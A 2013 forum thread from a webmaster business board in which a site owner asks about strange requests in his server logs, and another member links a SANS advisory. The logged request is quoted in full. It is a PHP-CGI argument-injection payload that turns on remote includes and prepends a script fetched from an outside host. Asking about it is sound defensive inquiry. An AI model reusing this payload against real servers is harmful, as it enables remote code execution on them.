Greenguy's Board


Go Back   Greenguy's Board > General Business Knowledge
Register FAQ Calendar Today's Posts

Reply
 
Thread Tools Search this Thread Rate Thread Display Modes
Old 2013-05-23, 03:41 PM   #1
ecchi
Banned
 
ecchi's Avatar
 
Join Date: Oct 2003
Location: About to be evicted!!!!
Posts: 4,082
Question Anyone know what is going on here?

Looking at the logs for sorority-initiations.com I have a few hits to a page called:
/?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/s.txt
(presumably http://sorority-initiations.com/?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/s.txt but my stats program removes the domain name before recording the page name)
No page on my site is set up to accept a query string (Perl is used but only in include statements).
I'm more than a little worried as http://gofastdownload.com/rf/s.txt appears to be a PHP command to load the content of another page on that domain, and gofastdownload.com is a newish registered domain on a Russian server. So I am assuming that my domain is being used by some asshole to do something shitty, but I have no idea what!

Anyone any ideas?

Thanks.
ecchi is offline   Reply With Quote
Old 2013-05-28, 02:23 AM   #2
lezinterracial
Well you know boys, a nuclear reactor is a lot like women. You just have to read the manual and press the right button
 
Join Date: Dec 2012
Posts: 152
Did you find out what was going on?

I found this. Trying to exploit an old PHP hole?

https://isc.sans.edu/diary/PHP+vulne...the+wild/13312

Last edited by lezinterracial; 2013-05-28 at 02:36 AM..
lezinterracial is offline   Reply With Quote
Old 2013-05-28, 04:42 AM   #3
ecchi
Banned
 
ecchi's Avatar
 
Join Date: Oct 2003
Location: About to be evicted!!!!
Posts: 4,082
Quote:
Originally Posted by lezinterracial View Post
Did you find out what was going on?

I found this. Trying to exploit an old PHP hole?

https://isc.sans.edu/diary/PHP+vulne...the+wild/13312
Thanks. I had not found what was being done, and unfortunately PHP is a language I don't know, so I don't understand most of what is on that site. However they appear to be saying that "it buggers about with PHP scripts on your site", and if that is the case I don't have a problem, because there aren't any PHP files on my site. Although there is, I guess, a PHP engine on the server.
ecchi is offline   Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 05:19 PM.


Mark Read
Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
© Greenguy Marketing Inc